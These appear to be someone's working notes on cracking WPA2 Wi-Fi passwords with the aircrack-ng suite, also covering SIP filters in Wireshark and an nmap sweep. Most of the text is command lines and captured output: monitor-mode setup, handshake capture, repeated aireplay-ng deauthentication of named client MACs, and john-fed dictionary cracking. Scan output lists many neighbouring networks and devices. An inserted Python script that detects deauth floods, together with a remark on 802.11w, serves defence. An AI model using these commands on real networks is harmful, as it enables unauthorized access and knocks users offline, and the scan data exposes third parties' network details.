 4C:12:65:77:AC:80  -80       11      2    0   1  54e  WPA2 CCMP   PSK  ATTMaSk44I
 BC:4D:FB:1A:81:C8  -80        4      0    0   2  54e  WPA2 CCMP   PSK  CGN-81C0

 BSSID              STATION            PWR   Rate    Lost   Frames  Probe

 (not associated)   FC:52:8D:76:F6:2C  -66    0 - 1      0      17  NETGEAR
 (not associated)   CC:6E:A4:31:91:24  -80    0 - 1      0       2
 2C:99:24:96:2A:11  B4:D5:BD:CA:5B:ED  -80    0 - 6e     0       6  ARRIS-2A13
 B4:75:0E:25:49:BE  00:9D:6B:41:55:B1  -16    0e- 1      6    3166
 B4:75:0E:25:49:BE  D8:31:34:68:77:AF  -36    0e- 0e     0      75
 B4:75:0E:25:49:BE  00:12:17:93:AC:AD  -60   36e-24e     0      20
 B4:75:0E:25:49:BE  B0:EE:7B:AF:1E:E3  -48    0e- 0e     0      31
 F4:17:B8:45:0D:62  38:1D:D9:05:B8:86  -80    1e- 1      0      10
 A0:04:60:35:2D:C5  40:4E:36:81:E8:EA   -1    1e- 0      0       8
 A0:04:60:35:2D:C5  B0:FC:0D:83:05:F4  -78    1e- 1e     0       5
Next, start capturing traffic for the AP with BSSID B4:75:0E:25:49:BE on channel 6 and write the traffic to the capture.cap log file using interface wlan0mon. Note that the "WPA handshake:" marker (in bold on the original page) pops up in the header line once the handshake has been caught.
$ sudo airodump-ng --bssid B4:75:0E:25:49:BE -c 1 -w capture.cap wlan0mon

 CH  1 ][ Elapsed: 1 min ][ 2019-10-01 10:12 ][ WPA handshake: B4:75:0E:25:49:BE

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 B4:75:0E:25:49:BE  -47   0      647   1038   12   1  54e  WPA2 CCMP   PSK  Private.net

 BSSID              STATION            PWR   Rate    Lost   Frames  Probe

 B4:75:0E:25:49:BE  00:9D:6B:41:55:B1  -26    0e-24      8    2139
 B4:75:0E:25:49:BE  5C:87:9C:7B:3D:6F  -33    0e- 0e     0     179
 B4:75:0E:25:49:BE  D0:13:FD:25:EB:20  -39    0e-24e     1      92
 B4:75:0E:25:49:BE  D8:31:34:68:77:AF  -45    0e- 1e     0      84
 B4:75:0E:25:49:BE  B0:EE:7B:AF:1E:E3  -68    0e- 0e     0      67
 B4:75:0E:25:49:BE  00:12:17:93:AC:AD  -71   24e-36e     0     121
From the previous results, find a station that is active on the AP of interest (D8:31:34:68:77:AF) and deauthenticate it, forcing it to reauthenticate while the previous logging command is still running. Deauthenticate client 5C:87:9C:7B:3D:6F or D8:31:34:68:77:AF:
$ sudo aireplay-ng --deauth 0 -a B4:75:0E:25:49:BE -c 5C:87:9C:7B:3D:6F wlp2s0mon
19:17:14  Waiting for beacon frame (BSSID: B4:75:0E:25:49:BE) on channel 1
19:17:15  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [25|63 ACKs]
19:17:16  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [29|69 ACKs]
19:17:16  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [28|67 ACKs]
19:17:17  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [30|65 ACKs]
19:17:17  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [29|69 ACKs]
19:17:18  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [31|65 ACKs]
19:17:18  Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [25|55 ACKs]
And so on until the handshake is caught, then CTRL+C to stop the deauth attack.
Restart to reset the wifi interface. Note that this does not usually work, and I have to reboot the OS.
$ sudo /etc/init.d/networking restart
[ ok ] Restarting networking (via systemctl): networking.service.
Use cowpatty to verify that you have captured a 4-way handshake. Note that you need a newer version than is in the Mint repository. Get the .deb from Ubuntu and install it with the following command.
$ sudo dpkg -i cowpatty_4.8-2_amd64.deb
Now you can run the following examples
$ sudo cowpatty -r test.capture.cap -c
$ sudo cowpatty -r capture.cap-02.cap -c
cowpatty 4.8 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Also check the cap file for the necessary packets/credentials
$ sudo pyrit -r test.capture.cap analyze
$ pyrit -r capture.cap-06.cap analyze
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file 'capture.cap-06.cap' (1/1)...
Parsed 60500 packets (60500 802.11-packets), got 1 AP(s)

#1: AccessPoint b4:75:0e:25:49:be ('Private.net'):
  #1: Station 00:9d:6b:41:55:b1
  #2: Station a4:8d:3b:0f:7d:dd
  #3: Station 00:12:17:93:ac:ad
  #4: Station d8:31:34:68:77:af, 5 handshake(s):
    #1: HMAC_SHA1_AES, good*, spread 1
    #2: HMAC_SHA1_AES, good*, spread 1
    #3: HMAC_SHA1_AES, good*, spread 1
    #4: HMAC_SHA1_AES, good*, spread 3125
    #5: HMAC_SHA1_AES, good*, spread 3125
  #5: Station d0:13:fd:25:eb:20
  #6: Station b0:ee:7b:af:1e:e3
Pull the handshake from the capture file. Use tshark as shown below.
The expressions often cited are the following:
eapol || wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04
eapol || wlan.fc.type_subtype == 0x08
eapol || wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05
$ tshark -r capture2.cap-01.cap -Y "eapol || wlan.fc.type_subtype == 0x08" -w captured.handshake
Pull the handshake from the capture file manually with WireShark
To filter on just one BSSID also include this filter using that BSSID's MAC, which would give you this filter:
You are looking for the 4 packets that make up the 4-way handshake. Use CTRL+m to select those 4 required packets. Then File/Export Specified Packets... and provide a filename. Export as pcap, and check 'Marked packets only'.
You can then run the following, which reports whether the handshake was actually captured.
$ sudo aircrack-ng capture2.cap-01.cap
Opening capture2.cap-01.cap
Read 9377 packets.

   #  BSSID              ESSID                     Encryption

   1  C8:52:61:97:05:B0  ATTFJ4Br3A                WPA (1 handshake)

Choosing first network as target.

Opening capture2.cap-01.cap
Please specify a dictionary (option -w).

Quitting aircrack-ng...
Then combine john and aircrack-ng to crack the credentials. This way, you can pause and restart a cracking session. Note that this wordlist takes ~11 hours to run.
$ sudo john --wordlist=Hacking/Research/wordlists/wordlist5.txt --session=Wifi.session --rules --stdout | aircrack-ng -b B4:75:0E:25:49:BE capture.cap-06.cap -w -
$ sudo john --wordlist=Hacking/Research/wordlists/wordlist5.txt --session=Wifi.session --rules --stdout | aircrack-ng -b B4:75:0E:25:49:BE Private.net.handshake.pcap -w -
Restore a paused session.
$ sudo john --restore=Wifi.session | aircrack-ng -b B4:75:0E:25:49:BE capture.cap-06.cap -w -
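The aireplay-ng step above works by injecting management frames the client cannot authenticate, and the tshark filters use Wireshark's wlan.fc.type_subtype values (0x08 beacon, 0x04/0x05 probe, 0x0c deauth) to pick frame types out of a capture. The script below is an added example (not part of these notes) written from the monitoring side: it decodes type_subtype from the first Frame Control byte and flags any BSSID that sends more than a threshold of deauth/disassoc frames in a sliding window, which is what a wireless IDS does to spot this step. The frames are constructed tuples; the page's BSSID B4:75:0E:25:49:BE and client 5C:87:9C:7B:3D:6F are reused as sample addresses, and the burst size mirrors the "Sending 64 directed DeAuth" lines aireplay-ng prints.

```python
"""Detect deauthentication/disassociation floods from parsed 802.11 frame
headers, the defender's counterpart of the aireplay-ng step above.

Added example, not part of the original notes.  Frames are constructed
tuples (timestamp, first Frame Control byte, addr1, addr2, addr3); the page's
BSSID B4:75:0E:25:49:BE and client 5C:87:9C:7B:3D:6F are reused as sample
addresses.  No capture file is read.
"""
from collections import defaultdict, deque


# Wireshark's wlan.fc.type_subtype is (type << 4) | subtype, both taken from
# the first Frame Control byte: bits 2-3 are the type, bits 4-7 the subtype.
def type_subtype(fc0: int) -> int:
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    return (ftype << 4) | subtype


PROBE_REQ, PROBE_RESP, BEACON = 0x04, 0x05, 0x08   # values used in the tshark filters above
DISASSOC, DEAUTH = 0x0A, 0x0C


def detect_deauth_floods(frames, window=1.0, threshold=32):
    """frames: iterable of (ts_seconds, fc0, addr1, addr2, addr3).

    Counts deauth/disassoc frames per BSSID (addr3) in a sliding window and
    returns {bssid: peak_count} for every BSSID that exceeded `threshold`.
    A legitimate AP deauthenticates clients occasionally; dozens per second
    from one BSSID means a deauth attack, a misbehaving controller, or a
    WIPS doing rogue-AP containment."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, fc0, _addr1, _addr2, bssid in sorted(frames, key=lambda f: f[0]):
        if type_subtype(fc0) not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(q))
    return alerts


AP = "B4:75:0E:25:49:BE"
STA = "5C:87:9C:7B:3D:6F"
OTHER_AP = "94:8F:CF:75:BE:00"
BROADCAST = "FF:FF:FF:FF:FF:FF"


def sample_frames():
    """Constructed traffic: beacons from two APs, a few QoS data frames, one
    ordinary deauth, and a 64-frame directed deauth burst spoofing AP."""
    frames = []
    for i in range(20):                                   # beacons, fc0 0x80
        frames.append((i * 0.1, 0x80, BROADCAST, AP, AP))
        frames.append((i * 0.1 + 0.05, 0x80, BROADCAST, OTHER_AP, OTHER_AP))
    for i in range(5):                                    # QoS data, fc0 0x88
        frames.append((0.3 + i * 0.02, 0x88, AP, STA, AP))
    frames.append((0.5, 0xC0, "AA:BB:CC:DD:EE:01", OTHER_AP, OTHER_AP))  # one deauth, normal
    for i in range(64):                                   # the burst, 10 ms apart, fc0 0xC0
        frames.append((1.0 + i * 0.01, 0xC0, STA, AP, AP))
    return frames


if __name__ == "__main__":
    for bssid, peak in detect_deauth_floods(sample_frames()).items():
        print(f"deauth flood from {bssid}: {peak} frames within 1 s")
```

The single deauth from the other AP stays below the threshold and only the 64-frame burst is reported. The fix on the network side is 802.11w Protected Management Frames: with MFP enabled, a client discards deauth/disassoc frames that fail the MIC check, so the injected ones are ignored. The `iw dev wlan0 station dump` output further down this page shows `MFP: no` for that association, which is the condition under which the deauth step succeeds.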
Good References:
Another stab at the aircrack-ng suite. aircrack-ng Read these to get all the details; https://www.mankier.com/8/airodump-ng https://nooblinux.com/crack-wpa-wpa2-wifi-passwords-using-aircrack-ng-kali-linux/ When looking for SIP traffic in Wireshark, you can start with the Display Filter sip. Here are a couple more specific filters. To find a specific type of SIP packet: sip.CSeq.method==REGISTER Sometimes you need to match registration traffic on the server and client (two Wireshark sessions). To see matching traffic, in a SIP Message Header, find a Call-ID on one side, then use a display filter like this on both the server side and client side: sip.Call-ID=="0_1218425253@192.168.15.23" It may be helpful to combine several filters: ip.addr = 162.39.14.21 and sip.CSeq.method==REGISTER and sip.from.user==120 The upper data block shows the access points found: BSSID The MAC address of the AP RXQ Quality of the signal, when locked on a channel PWR Signal strength. Some drivers don't report it Beacons Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality Data Number of data frames received CH Channel the AP is operating on MB Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture ENC Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet) ESSID The network name. Sometimes hidden The lower data block shows the clients found: BSSID The MAC of the AP this client is associated to STATION The MAC of the client itself PWR Signal strength. 
Some drivers don't report it Packets Number of data frames received Probes Network names (ESSIDs) this client has probed $ sudo iw dev phy#1 Interface wlan1 ifindex 5 wdev 0x100000001 addr 00:c0:ca:8f:2b:07 type managed txpower 20.00 dBm phy#0 Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 type managed txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ sudo ip link set wlan0 down $ sudo iw wlan0 set monitor none $ sudo ip link set wlan0 up $ ifconfig eth0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 10.32.10.194 netmask 255.255.255.0 broadcast 10.32.10.255 inet6 fe80::9267:4903:de59:c1e3 prefixlen 64 scopeid 0x20 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 1406538 bytes 1916660178 (1.7 GiB) RX errors 0 dropped 104 overruns 0 frame 0 TX packets 269904 bytes 112351773 (107.1 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 lo: flags=73(UP,LOOPBACK,RUNNING) mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 287 bytes 20835 (20.3 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 287 bytes 20835 (20.3 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 unspec 00-C0-CA-8F-2B-07-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 454 bytes 124082 (121.1 KiB) RX errors 0 dropped 435 overruns 0 frame 0 TX packets 41 bytes 3777 (3.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ sudo iw dev phy#1 Interface wlan1 ifindex 5 wdev 0x100000001 addr 00:c0:ca:8f:2b:07 type monitor channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz txpower 20.00 dBm phy#0 Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 type managed txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ sudo airmon-ng PHY 
Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) $ sudo airmon-ng start wlan0 [sudo] password for parth: Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 1266 NetworkManager 1493 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) or $ sudo airmon-ng [sudo] password for parth: PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 $ sudo airmon-ng check kill Killing these processes: PID Name 1493 wpa_supplicant $ sudo airmon-ng check kill $ ifconfig eth0: flags=4099(UP,BROADCAST,MULTICAST) mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 wlan0mon: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 unspec B0-7D-64-E7-BA-A3-00-4F-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 66 bytes 13092 (12.7 KiB) RX errors 0 dropped 66 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on Note, read the man airodump-ng page! Lots of great info! 
$ sudo airodump-ng wlan0mon CH 7 ][ Elapsed: 2 mins ][ 2022-05-29 22:28 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 94:8F:CF:75:BE:00 -60 123 185 0 1 195 WPA2 CCMP PSK ATTB2f6CTA BC:A5:11:99:2E:38 -1 245 0 0 6 360 WPA2 CCMP PSK ATTFJ4Br3A_2GEXT C8:C7:50:F5:06:E0 -69 104 71 0 11 195 WPA2 CCMP PSK peasants 24:94:CB:8C:AA:76 -30 104 0 0 1 195 WPA2 CCMP PSK ARRIS-02DD 2C:30:33:E7:45:7D -33 78 0 0 1 130 WPA2 CCMP PSK belkin.e80_2GEXT 94:8F:CF:1C:94:50 -34 15 1 0 1 195 WPA2 CCMP PSK FBI van 38:A0:67:82:D2:44 -33 83 103 0 1 260 WPA2 CCMP PSK ATTg6PWDNg CC:AB:2C:88:75:04 -34 86 7 0 11 260 WPA2 CCMP PSK ATTNYvm2Zc BA:2C:A0:8B:15:63 -34 107 0 0 6 65 OPN NewThermostat_8B1563 EC:C3:02:9B:7A:24 -34 15 7 0 1 260 WPA2 CCMP PSK ATT1 2C:99:24:2D:4D:B9 -36 18 0 0 11 195 WPA2 CCMP PSK ARRIS-4DBB 86:EA:ED:4F:DA:81 -79 82 0 0 1 65 WPA2 CCMP PSK (length: 0) F4:17:B8:45:0D:62 -86 101 186 0 11 130 WPA2 CCMP PSK ATTB2f6CTA A2:17:B8:45:0D:63 -33 100 185 0 11 130 WPA2 CCMP PSK 30:E1:71:B2:B8:66 -89 52 0 0 11 65 WPA2 CCMP PSK DIRECT-65-HP ENVY 4510 C8:52:61:97:05:B0 -126 187 42 0 6 195 WPA2 CCMP PSK ATTFJ4Br3A 5C:E3:0E:94:A1:CC -1 0 0 0 11 -1 (length: 0) 2C:99:24:61:7F:D9 -36 7 0 0 11 195 WPA2 CCMP PSK ARRIS-7FDB BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) A4:8D:3B:0F:7D:DD -53 0 - 1 49 144 Private.net (not associated) FC:52:8D:76:F6:2C -83 0 - 1 0 10 NETGEAR (not associated) 2C:30:33:E7:45:7D -83 0 - 1 58 15 belkin.e80 (not associated) 76:AF:15:76:16:3C -89 0 - 1 0 2 (not associated) FA:10:C5:AD:54:D2 -91 0 - 1 0 1 (not associated) 06:2C:D7:EA:72:DD -89 0 - 1 0 3 94:8F:CF:75:BE:00 84:EA:ED:4F:DA:81 -79 24e- 1e 0 8 C8:C7:50:F5:06:E0 C2:06:06:03:61:B3 -1 24e- 0 0 56 5C:E3:0E:94:A1:CC 74:E2:0C:38:70:02 -93 0 - 1 0 1 2C:99:24:61:7F:D9 54:E0:19:F3:D9:41 -88 0 - 1e 0 1 Quitting... 
kali This is the name of the file that we’re gonna store the captures in the channel that we’re gonna attack is one the BSSID that we’re gonna attack is 50:D4:F7:E5:66:F4 and the interface we’re gonna use is wlan0 $ airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0 or $ airodump-ng -c 11 -w pokingaround --bssid F4:92:BF:38:DB:26 wlan1 Now we are capturing packets. Next we deauth a client. Deauth this host C2:06:06:03:61:B3 $ aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0 $ aireplay-ng –deauth 10 -a 50:D4:F7:E5:66:F4 wlan0 $ sudo aireplay-ng – deauth 50 -a (BSSID-MAC) (Wireless-Interface) In the above command it is optional to give the client mac address it is given by -c (client mac) Watch the other screen for the message that the handshake has been captured. CH 5 ][ Elapsed: 42 s ][ 2022-06-01 17:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E8:9F:80:43:55:91 -45 19 22 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:43:55:91 -26 15 0 0 1 360 WPA2 CCMP PSK ccccguest F2:9F:80:43:55:91 -26 5 0 0 1 360 WPA2 CCMP PSK (length: 0) C4:41:1E:26:0D:B4 -43 25 0 0 4 360 WPA2 CCMP PSK Office CA:41:1E:26:0D:B4 -43 23 0 0 4 360 WPA2 CCMP PSK Office_Private EE:9F:80:43:55:05 -49 21 0 0 11 360 WPA2 CCMP PSK ccccguest E8:9F:80:43:55:41 -49 4 0 0 6 360 WPA2 CCMP PSK CCCCPrivate F2:9F:80:43:55:05 -50 17 0 0 11 360 WPA2 CCMP PSK (length: 0) E8:9F:80:43:55:05 -50 22 24 0 11 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:9C:13 -50 11 0 0 6 360 WPA2 CCMP PSK ccccguest EE:9F:80:43:55:41 -51 9 0 0 6 360 WPA2 CCMP PSK ccccguest F2:9F:80:43:55:41 -55 8 0 0 6 360 WPA2 CCMP PSK (length: 0) C0:74:AD:3C:15:0D -55 14 0 0 6 720 WPA3 CCMP SAE Horsepower B4:5D:50:C4:33:C4 -55 8 0 0 11 195 WPA2 CCMP PSK the593 E8:26:89:4C:B5:24 -56 9 0 0 6 130 WPA2 CCMP PSK the593 6C:AE:F6:86:91:B5 -58 5 0 0 2 360 OPN (length: 0) 6C:AE:F6:86:91:B1 -58 8 1 0 2 360 WPA3 CCMP SAE (length: 0) B4:5D:50:C4:33:C0 -59 4 0 0 11 195 WPA2 CCMP PSK (length: 0) B4:5D:50:C4:33:C5 -60 7 0 0 11 195 WPA2 CCMP PSK (length: 0) 
B4:5D:50:C4:33:C3 -60 6 0 0 11 195 OPN TSC_Customer_Wi-Fi E8:26:89:4C:B5:23 -60 13 0 0 6 130 OPN TSC_Customer_Wi-Fi F4:92:BF:38:DB:26 -61 6 7 0 11 270 WPA2 CCMP PSK (length: 0) 78:6A:1F:6C:88:14 -62 0 0 0 1 195 WPA2 CCMP PSK ARRIS-28A1 B4:5D:50:C4:33:C2 -62 4 0 0 11 195 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:20 -62 12 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:22 -62 17 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:21 -62 17 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:9F:80:EB:9C:77 -62 9 13 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:9C:77 -62 10 0 0 1 360 WPA2 CCMP PSK ccccguest A8:BD:27:69:EC:45 -64 4 0 0 1 195 WPA2 CCMP PSK (length: 0) CA:52:61:B0:26:21 -64 7 0 0 1 195 WPA2 CCMP PSK Ashbyfamily_guest 60:38:E0:D3:18:05 -64 1 1 0 4 260 WPA2 CCMP PSK Linksys14423 C8:52:61:B0:26:20 -64 1 3 0 1 195 WPA2 CCMP PSK Ashbyfamily A8:BD:27:6A:50:C1 -64 7 0 0 6 195 WPA2 CCMP PSK (length: 0) F2:9F:80:EB:9C:77 -64 7 0 0 1 360 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:25 -65 8 0 0 6 130 WPA2 CCMP PSK (length: 0) A8:BD:27:69:EC:43 -65 11 0 0 1 195 OPN TSC_Customer_Wi-Fi C4:F1:74:8C:10:24 -66 2 0 0 1 360 WPA3 CCMP SAE (length: 0) 26:56:FE:C8:FD:3B -66 3 0 0 11 360 WPA2 CCMP PSK Protech E8:9F:80:EB:A3:B1 -67 2 0 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:A3:B1 -67 5 0 0 1 360 WPA2 CCMP PSK ccccguest F2:9F:80:EB:A3:B1 -67 7 1 0 1 360 WPA2 CCMP PSK (length: 0) 32:56:FE:C8:FD:3B -67 5 0 0 11 360 OPN CC-Special 88:DC:96:49:B3:88 -67 11 0 0 6 270 WPA2 CCMP PSK CCCCPrivate D0:D3:E0:D5:D4:84 -67 8 0 0 1 130 WPA2 CCMP PSK the593 2C:99:24:97:3C:51 -67 0 0 0 1 195 WPA2 CCMP PSK ARRIS-3C53 Quitting... 
4 Dec 28 13:36 Pictures.From.Android drwxr-xr-x 4 parth 4096 Jan 1 19:47 VMs CH 6 ][ Elapsed: 1 min ][ 2022-06-01 18:02 ][ display sta only BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) A4:8D:3B:17:E1:9B -46 0 - 1 0 5 CCCCOffice (not associated) 3C:9B:D6:91:70:E0 -58 0 - 1 39 18 StudentTech (not associated) 02:BE:B7:1C:58:58 -54 0 - 1 0 2 (not associated) F6:E2:F1:9C:C0:98 -58 0 - 1 0 1 (not associated) 3E:7F:3D:A3:AB:1D -60 0 - 1 0 1 (not associated) 1E:1A:98:E2:68:E7 -60 0 - 1 0 1 (not associated) 0E:81:25:3B:F4:FF -60 0 - 1 0 3 (not associated) C2:CB:98:1F:CB:17 -60 0 - 1 0 1 (not associated) 16:6B:BF:46:32:6D -62 0 - 1 0 1 (not associated) 2E:6D:57:2D:DE:9D -64 0 - 1 0 1 (not associated) 72:F6:77:95:BE:E3 -64 0 - 1 0 1 (not associated) 0A:9B:E3:68:B0:5A -68 0 - 1 0 1 (not associated) 2C:D9:74:87:8A:57 -68 0 - 1 0 6 MySpectrumWiFi98-5G (not associated) 1A:64:38:17:05:15 -70 0 - 1 0 1 (not associated) 3C:CF:5B:75:79:8B -70 0 - 1 0 4 (not associated) 0A:BE:F1:CA:92:FB -72 0 - 1 0 1 (not associated) AA:15:C6:47:04:88 -72 0 - 1 0 1 (not associated) F8:4F:AD:73:C9:14 -72 0 - 1 0 13 ARRIS-5522-5G (not associated) A2:60:33:1E:3C:90 -74 0 - 1 0 1 TMobileWingman (not associated) BA:B6:B1:BC:7A:5B -74 0 - 1 0 1 (not associated) D6:08:4A:7F:D3:C3 -74 0 - 1 0 2 (not associated) B4:EC:02:A9:A1:6B -74 0 - 1 0 4 (not associated) AC:89:95:79:1C:91 -76 0 - 1 0 1 ATT-WIFI-7052 (not associated) 36:6B:4C:FE:D4:01 -60 0 - 1 0 2 (not associated) 42:AE:2A:4D:87:07 -66 0 - 1 0 1 (not associated) 42:4A:A2:7E:8A:C9 -68 0 - 1 0 1 (not associated) AE:27:B2:59:73:55 -68 0 - 1 0 1 (not associated) D6:61:85:8C:7A:8A -82 0 - 1 0 2 (not associated) E6:2F:53:F0:AA:5D -78 0 - 1 0 1 (not associated) 12:C7:F6:EC:C9:F4 -70 0 - 1 0 1 (not associated) 62:98:AD:C6:FC:D6 -74 0 - 1 0 1 (not associated) 0C:EC:84:6F:C1:99 -70 0 - 1 0 2 6C:AE:F6:86:91:BC 6C:AE:F6:86:91:B1 -62 0 -11 0 3 00:00:00:00:00:00 0A:56:FE:C8:FD:3B -70 0 -12 0 2 00:25:00:FF:94:73 22:F1:A7:02:2A:7D -64 0 -12 0 2 
00:25:00:FF:94:73  D6:FF:34:DE:7B:B8  -66   0 -12     0    1
E8:9F:80:43:55:91  DA:92:8A:19:A7:4A  -16   0 -24     0   18
E8:9F:80:43:55:91  2C:64:1F:2A:DC:1A  -58   6e-24e    0   11
8A:DC:96:49:B3:88  00:6B:9E:E9:E1:EB  -76   0 - 1e    0    2
F4:92:BF:38:DB:26  F4:92:BF:38:DB:22  -76  12 -12     0 1081
C0:D7:AA:E0:F5:29  02:0A:F7:1D:1A:F8  -76   0 - 1     0   12
78:6A:1F:6C:88:14  18:69:D8:B7:F1:63  -72   0 - 1     0    2
D0:D3:E0:D5:D4:81  10:98:C3:61:88:1C  -80   0 - 1     0    1
2C:99:24:8D:AE:09  5C:E5:0C:69:F7:B4  -72   0 - 1e    0    1
2C:99:24:8D:AE:09  A2:00:44:3A:DA:24  -74   0 - 1e    0   25
Quitting...
BASE   F4:92:BF:38:DB:26 -61 6 7 0 11 270 WPA2 CCMP PSK (length: 0)
CLIENT F4:92:BF:38:DB:26 F4:92:BF:38:DB:22 -76 12 -12 0 1081
sudo airodump-ng -c 11 -w pokingaround --bssid F4:92:BF:38:DB:26 wlan1mon
sudo aireplay-ng --deauth 32 -a F4:92:BF:38:DB:26 -c F4:92:BF:38:DB:22 wlan1mon
$ sudo iw dev wlan0 station dump
Station c6:52:61:97:05:b3 (on wlan0)
	inactive time:	396 ms
	rx bytes:	11411560
	rx packets:	10411
	tx bytes:	822955
	tx packets:	4228
	tx retries:	352
	tx failed:	0
	beacon loss:	0
	beacon rx:	3521
	rx drop misc:	35
	signal:  	-58 [-58, -59] dBm
	signal avg:	-54 dBm
	beacon signal avg:	-53 dBm
	tx bitrate:	780.0 MBit/s VHT-MCS 8 80MHz short GI VHT-NSS 2
	tx duration:	0 us
	rx bitrate:	866.7 MBit/s VHT-MCS 9 80MHz short GI VHT-NSS 2
	rx duration:	0 us
	authorized:	yes
	authenticated:	yes
	associated:	yes
	preamble:	long
	WMM/WME:	yes
	MFP:		no
	TDLS peer:	no
	DTIM period:	3
	beacon interval:100
	short slot time:yes
	connected time:	407 seconds
	associated at [boottime]:	21.301s
	associated at:	1654309294642 ms
	current time:	1654309701352 ms
$ sudo nmap -sn 192.168.1.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 22:31 EDT
Nmap scan report for unknowna48d3b1fe853.attlocal.net (192.168.1.65)
Host is up (0.013s latency).
MAC Address: A4:8D:3B:1F:E8:53 (Vizio)
Nmap scan report for unknownc2a511992e38.attlocal.net (192.168.1.94)
Host is up (0.039s latency).
MAC Address: C2:A5:11:99:2E:38 (Unknown)
Nmap scan report for RokuStreamingStick.attlocal.net (192.168.1.129)
Host is up (0.0089s latency).
MAC Address: D8:31:34:68:77:AF (Roku)
Nmap scan report for 192.168.1.244
Host is up (0.29s latency).
MAC Address: 52:52:CF:AE:9F:81 (Unknown)
Nmap scan report for 192.168.1.253
Host is up (0.0037s latency).
MAC Address: C8:52:61:97:05:B2 (Arris Group)
Nmap scan report for dsldevice.attlocal.net (192.168.1.254)
Host is up (0.0086s latency).
MAC Address: C8:52:61:97:05:B0 (Arris Group)
Nmap scan report for Parth.attlocal.net (192.168.1.230)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.83 seconds
